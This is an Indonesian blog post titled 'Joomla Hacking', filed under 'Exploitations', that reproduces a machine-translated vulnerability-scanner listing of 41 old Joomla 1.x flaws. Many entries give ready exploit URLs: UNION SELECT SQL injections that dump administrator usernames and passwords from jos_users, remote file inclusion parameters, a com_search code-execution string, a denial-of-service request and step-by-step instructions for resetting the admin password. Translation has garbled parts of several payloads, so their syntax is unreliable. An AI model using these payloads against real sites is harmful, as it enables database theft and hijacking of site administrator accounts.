• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    SBS opening Fix Autosultan

    Autosultan zonamotivasi
    Januari 25, 2022
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "Joomla Hacking"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeExploitationsJoomla Hacking
    Joomla Hacking

    Joomla Hacking

    Simpan Postingan
    Versi Generik keluarga ....... [1.5.x]

    ~ 1.5.x htaccess.txt mengungkapkan [1.5.4 - 1.5.14]
    ~ 1.5.x en-GB.ini mengungkapkan [1.5.12 - 1.5.14]

    berbagai versi: [1.5.12 - 1.5.14]

    kerentanan Ditemukan


    # 1
    Info -> Generik: htaccess.txt belum diganti.
    Versi yang dipengaruhi: Apa
    Periksa: /htaccess.txt
    Exploit: pertahanan Generic diterapkan di .htaccess tidak tersedia, sehingga pemanfaatan lebih mungkin untuk berhasil.
    Rentan? iya nih

    # 2
    Info -> Generik: direktori Administrator tidak dilindungi
    Versi yang dipengaruhi: Apa
    Periksa: / administrator /
    Exploit: Direktori default / administrator terdeteksi. Penyerang dapat bruteforce account administrator.
    Rentan? N / A

    # 3
    Info -> Inti: Beberapa XSS / CSRF Kerentanan
    Versi yang dipengaruhi: 1.5.9 <=
    Periksa: /?1.5.9-x
    Exploit: Serangkaian XSS dan CSRF kesalahan ada di aplikasi administrator. Dipengaruhi komponen administrator termasuk com_admin, com_media, com_search. Kedua com_admin dan com_search mengandung kerentanan XSS, dan com_media berisi 2 kerentanan CSRF.
    Rentan? Tidak

    # 4
    Info -> Inti: JSession SSL Sesi Pengungkapan Kerentanan
    Versi dilakukan: Joomla! 1.5.8 <=
    Periksa: /?1.5.8-x
    Exploit: Saat menjalankan sebuah situs di bawah SSL (seluruh situs dipaksa untuk berada di bawah ssl), Joomla! tidak mengatur bendera SSL pada cookie. Hal ini dapat memungkinkan seseorang pemantauan jaringan untuk menemukan cookie yang terkait dengan sesi.
    Rentan? Tidak

    # 5
    Info -> Inti: Frontend XSS Vulnerability
    Versi dilakukan: 1.5.10 <=
    Periksa: /?1.5.10-x
    Exploit: Beberapa nilai yang keluaran dari database tanpa melarikan diri dengan benar. Kebanyakan senar tersebut yang bersumber dari panel administrator. Berbahaya admin normal dapat memanfaatkan itu untuk mendapatkan akses ke yang super admin.
    Rentan? Tidak

    # 6
    Info -> Inti: Hilang JEXEC Check - Jalur Pengungkapan Kerentanan
    Versi dilakukan: 1.5.11 <=
    Periksa: /libraries/phpxmlrpc/xmlrpcs.php
    Exploit: /libraries/phpxmlrpc/xmlrpcs.php
    Rentan? Tidak

    # 7
    Info -> Inti: Hilang JEXEC Check - Jalur Pengungkapan Kerentanan
    Versi dilakukan: 1.5.12 <=
    Periksa: /libraries/joomla/utilities/compat/php50x.php
    Exploit: /libraries/joomla/utilities/compat/php50x.php
    Rentan? Tidak

    # 8
    Info -> Inti: Frontend XSS - HTTP_REFERER tidak disaring dengan benar Kerentanan
    Versi dilakukan: 1.5.11 <=
    Periksa: /?1.5.11-x-http_ref
    Exploit: Seorang penyerang dapat menyuntikkan JavaScript atau DHTML kode yang akan dieksekusi dalam konteks pengguna browser yang ditargetkan, yang memungkinkan penyerang untuk mencuri cookies. variabel HTTP_REFERER tidak benar diurai.
    Rentan? Tidak

    # 9
    Info -> Inti: Frontend XSS - PHP_SELF tidak disaring dengan benar Kerentanan
    Versi dilakukan: 1.5.11 <=
    Periksa: /?1.5.11-x-php-s3lf
    Exploit: Seorang penyerang bisa menyuntikkan kode JavaScript di URL yang akan dijalankan dalam konteks pengguna peramban ditargetkan.
    Rentan? Tidak

    # 10
    Info -> Inti: Authentication Bypass Vulnerability
    Versi dilakukan: Joomla! 1.5.3 <=
    Periksa: / administrator /
    Exploit: Backend menerima password untuk custom Super Administrator ketika LDAP diaktifkan
    Rentan? Tidak

    # 11
    Info -> Inti: Jalur Pengungkapan Kerentanan
    Versi dilakukan: Joomla! 1.5.3 <=
    Periksa: /?1.5.3-path-disclose
    Exploit: URL Dibuat dapat mengungkapkan path absolut
    Rentan? Tidak

    # 12
    Info -> Inti: Pengguna diarahkan Spamming Kerentanan
    Versi dilakukan: Joomla! 1.5.3 <=
    Periksa: /?1.5.3-spam
    Exploit: Pengguna mengarahkan spam yang
    Rentan? Tidak

    # 13
    Info -> Inti: joomla.php Remote File Inclusion Vulnerability
    Versi dilakukan: 1.0.0
    Periksa: /includes/joomla.php
    Exploit: /includes/joomla.php?includepath=
    Rentan? Tidak

    # 14
    Info -> Inti: Admin Backend Cross Site Request Pemalsuan Kerentanan
    Versi dilakukan: 1.0.13 <=
    Periksa: / administrator /
    Exploit: Hal ini membutuhkan administrator untuk login dan akan tertipu halaman web khusus dibuat.
    Rentan? iya nih

    # 15
    Info -> Inti: Jalur Pengungkapan Kerentanan
    Versi dilakukan: Joomla! 1.5.12 <=
    Periksa: /libraries/joomla/utilities/compat/php50x.php
    Exploit: /libraries/joomla/utilities/compat/php50x.php
    Rentan? Tidak

    # 16
    Info -> CorePlugin: XStandard Editor X_CMS_LIBRARY_PATH lokal Directory Traversal Kerentanan
    Versi dilakukan: Joomla! 1.5.8 <=
    Periksa: /plugins/editors/xstandard/attachmentlibrary.php
    Exploit: Menyerahkan X_CMS_LIBRARY_PATH header baru dengan nilai ../ ke /plugins/editors/xstandard/attachmentlibrary.php
    Rentan? Tidak

    # 17
    Info -> CoreTemplate: ja_purity XSS Vulnerability
    Versi dilakukan: 1.5.10 <=
    Periksa: / templates / ja_purity /
    Exploit: Sebuah kerentanan XSS ada di template JA_Purity yang kapal dengan Joomla! 1.5.
    Rentan? Tidak

    # 18
    Info -> CoreLibrary: phpmailer eksekusi kode jauh Kerentanan
    Versi dilakukan: Joomla! 1.5.0 Beta / Stabil
    Periksa: /libraries/phpmailer/phpmailer.php
    Exploit: N / A
    Rentan? Tidak

    # 19
    Info -> CorePlugin: TinyMCE TinyBrowser addon beberapa kerentanan
    Versi dilakukan: Joomla! 1.5.12
    Periksa: / plugins / editor / TinyMCE / JScripts / tiny_mce / plugins / tinybrowser /
    Exploit: Sementara Joomla! Tim mengumumkan hanya Upload File kerentanan, sebenarnya ada banyak. Lihat: http://www.milw0rm.com/exploits/9296
    Rentan? iya nih

    # 20
    Info -> CoreComponent: Joomla jauh Admin Password Change Vulnerability
    Versi yang dipengaruhi: 1.5.5 <=
    Periksa: /components/com_user/controller.php
    Eksploitasi: 1. Pergi ke url: target.com/index.php?option=com_user&view=reset&layout=confir m 2. Tulis ke lapangan "token" char 'dan klik OK. 3. Tulis password baru untuk admin 4. Pergi ke url: target.com/administrator/ 5. Login admin dengan password baru
    Rentan? Tidak

    # 21
    Info -> CoreComponent: Com_content SQL Injection Vulnerability
    Versi Terkena: Joomla! 1.0.0 <=
    Periksa: / komponen / Com_content /
    Exploit: /index.php?option=com_content&task=blogcategory&id= 60 & Itemid = 99999 + UNION + SELECT + 1, concat (0x1E, userna saya, 0x3a, password, 0x1E, 0x3a, jenis user, 0x1E), 3,4,5 + FRO M + jos_users + mana + jenis user = 0x53757065722041646d696 e6973747261746f72--
    Rentan? Tidak

    # 22
    Info -> CoreComponent: com_search eksekusi kode jauh Kerentanan
    Versi Terkena: Joomla! 1.5.0 beta 2 <=
    Periksa: / komponen / com_search /
    Exploit: /index.php?option=com_search&Itemid=1&searchword=%2 2% 3Becho% 20md5 (911)% 3B
    Rentan? Tidak

    # 23
    Info -> CoreComponent: com_admin File Inclusion Vulnerability
    Versi yang dipengaruhi: N / A
    Periksa: /administrator/components/com_admin/admin.admin.html.php
    Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
    Rentan? Tidak

    # 24
    Info -> CoreComponent: MailTo Injection Vulnerability SQL
    Versi dilakukan: N / A
    Periksa: / komponen / com_mailto /
    Exploit: /index.php?option=com_mailto&tmpl=mailto&article=55 0513 + dan + 1 = 2 + union + pilih + concat (username, char (58), password) + dari jos_users + + di mana + jenis user = 0x5375706 5722041646d696e6973747261746f72-- & Itemid = 1
    Rentan? Tidak

    # 25
    Info -> CoreComponent: Com_content Blind SQL Injection Vulnerability
    Versi dilakukan: Joomla! 1.5.0 RC3
    Periksa: / komponen / Com_content /
    Exploit: /index.php?option=com_content&view=% a a & id '+' '=' = 25 & Itemid = 28
    Rentan? Tidak

    # 26
    Info -> CoreComponent: Com_content XSS Vulnerability
    Versi Terkena: Joomla! 1.5.7 <=
    Periksa: / komponen / Com_content /
    Exploit: The default pada Com_content kiriman artikel memungkinkan masuknya tag berbahaya HTML (script, dll). Ini hanya mempengaruhi pengguna dengan tingkat akses Pengarang atau lebih tinggi, dan hanya jika Anda belum menetapkan pilihan penyaringan dalam konfigurasi Com_content.
    Rentan? Tidak

    # 27
    Info -> CoreComponent: com_weblinks XSS Vulnerability
    Versi Terkena: Joomla! 1.5.7 <=
    Periksa: / komponen / com_weblinks /
    Exploit: [Memerlukan akun pengguna yang valid] com_weblinks memungkinkan HTML mentah menjadi judul dan deskripsi tag untuk pengajuan weblink (baik dari bentuk administrator dan situs pengiriman).
    Rentan? Tidak

    # 28
    Info -> CoreComponent: com_mailto Email Spam Kerentanan
    Versi Terkena: Joomla! 1.5.6 <=
    Periksa: / komponen / com_mailto /
    Exploit: Komponen mailto tidak memverifikasi keabsahan URL sebelum mengirimkan.
    Rentan? Tidak

    # 29
    Info -> CoreComponent: view Com_content = SQL arsip Injection Vulnerability
    Versi dilakukan: Joomla! 1.5.0 Beta1 / Beta2 / RC1
    Periksa: / komponen / Com_content /
    Exploit: vars POST tanpa filter - filter, bulan, tahun ke /index.php?option=com_content&view=archive
    Rentan? Tidak

    # 30
    Info -> CoreComponent: Com_content XSS Vulnerability
    Versi Terkena: Joomla! 1.5.9 <=
    Periksa: / komponen / Com_content /
    Exploit: Sebuah kerentanan XSS ada di kategori pandangan Com_content.
    Rentan? Tidak

    # 31
    Info -> CoreComponent: com_installer CSRF Kerentanan
    Versi dilakukan: Joomla! 1.5.0 Beta
    Periksa: / administrator / components / com_installer /
    Exploit: N / A
    Rentan? Tidak

    # 32
    Info -> CoreComponent: com_search Memory comsumption DoS Kerentanan
    Versi dilakukan: Joomla! 1.5.0 Beta
    Periksa: / komponen / com_search /
    Exploit: N / A
    Rentan? Tidak

    # 33
    Info -> CoreComponent: com_poll (mosmsg) Konsumsi Memory DOS Kerentanan
    Versi dilakukan: 1.0.7 <=
    Periksa: / komponen / com_poll /
    Exploit: Kirim permintaan /index.php?option=com_poll&task=results&id=14&mosms g = DOS @ HERE <<> AAA <> <>
    Rentan? Tidak

    # 34
    Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
    Versi dilakukan: N / A
    Periksa: / komponen / com_banners /
    Exploit: /index.php?option=com_banners&task=archivesection&i d = 0 '+ dan +' 1 '=' 1 :: / index.php option = com_banners & tugas = archivesection & i d = 0 '+ dan +' 1 '=' 2?
    Rentan? Tidak

    # 35
    Info -> CoreComponent: com_mailto batas waktu Kerentanan
    Versi dilakukan: 1.5.13 <=
    Periksa: / komponen / com_mailto /
    Exploit: [Membutuhkan akun pengguna yang valid] Dalam com_mailto, itu mungkin untuk memotong perlindungan batas waktu terhadap mengirim email otomatis.
    Rentan? iya nih

    # 36
    Info -> Komponen: PBE XSS + Berkas Inklusi Kerentanan
    Versi yang dipengaruhi: 1.0.4 <=
    Periksa: / komponen / com_jce /
    Exploit: 1) Masukan diteruskan ke "img", "title", "w", dan "h" parameter dalam jce.php tidak benar dibersihkan sebelum dikembalikan ke pengguna. Ini dapat dimanfaatkan untuk mengeksekusi HTML sewenang-wenang dan kode script di sesi browser pengguna dalam konteks situs yang terpengaruh. 2) Masukan diteruskan ke "plugin" dan "file" parameter dalam jce.php tidak benar diverifikasi sebelum digunakan untuk menyertakan file. Ini dapat dimanfaatkan untuk menyertakan file arbitrary dari sumber daya lokal.
    Rentan? Tidak

    # 37
    Info -> Component: com_k2 (sectionid) Kerentanan SQL Injection
    Versi dilakukan: 1.0.1 Beta <=
    Periksa: / komponen / com_k2 /
    Exploit: /index.php?option=com_k2&view=itemlist&category=nul l '+ dan + 1 = 2 + union + pilih + 1, concat (username, 0x3a, pas pedang), 3,4,5,6,7,8 , 9,10,11,12,13,14 + dari jos_users + + di mana + jenis user = 0x53757065722041646d696e6973747261 746f72--
    Rentan? Tidak

    # 38
    Info -> Komponen: Dada Mail Manajer Komponen Remote File Inclusion Vulnerability
    Versi Terkena: 2.6 <=
    Periksa: / administrator / komponen /
    Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
    Rentan? Tidak

    # 39
    Info -> Komponen: Komponen com_newsfeeds SQL injection
    Versi yang dipengaruhi: Setiap <=
    Periksa: /index.php?option=com_newsfeeds&view=categories&fee melakukan = -1% 20union% 20select% 201, concat% 28username, char% 2858% 29, password% 29,3,4,5,6,7,8,9 , 10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30% 20from% 20jos_users--
    Exploit: /index.php?option=com_newsfeeds&view=categories&fee melakukan = -1% 20union% 20select% 201, concat% 28username, char% 2858% 29, password% 29,3,4,5,6,7,8,9 , 10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30% 20from% 20jos_users--
    Rentan? Tidak

    # 40
    Info -> Komponen: Joomla Komponen com_searchlog SQL Injection
    Versi yang dipengaruhi: 3.1.0 <=
    Periksa: /administrator/index.php?option=com_searchlog&act=log
    Exploit: /administrator/index.php?option=com_searchlog&act=log
    Rentan? Tidak

    # 41
    Info -> Komponen: Joomla Komponen com_djartgallery Beberapa Kerentanan
    Versi yang dipengaruhi: 0.9.1 <=
    Periksa: /administrator/index.php?option=com_djartgallery&task=editItem&ci d [] = 1 '+ dan + 1 = 1 + - +
    Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&ci d [] = 1 '+ dan + 1 = 1 + - +
    Rentan? N / A
    Exploitations
    Mei 12, 2016 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan